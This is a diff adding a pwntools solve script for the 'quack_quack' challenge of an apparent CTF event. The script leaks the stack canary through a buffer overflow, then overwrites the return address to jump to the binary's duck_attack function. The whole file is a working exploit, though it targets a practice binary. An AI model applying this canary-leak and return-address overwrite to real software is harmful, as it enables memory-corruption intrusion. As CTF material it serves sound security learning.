solve script

cyberapocalypse_ctf_2025_tales_from_eldoria/quack_quack/a.py

@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./quack_quack", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendafter(b"> ", a)
+
+# buf
+buf = b"A"*89
+buf += b"Quack Quack "
+buf += b"B"
+s(buf)
+r.recvuntil(b"Quack Quack ")
+canary = u64(r.recv(7).rjust(8, b"\x00"))
+log.info("canary: %#x", canary)
+
+# buf
+buf = b"A"*88
+buf += p64(canary)
+buf += b"JUNK"*2
+buf += p64(target.sym.duck_attack)
+s(buf)
+
+r.interactive()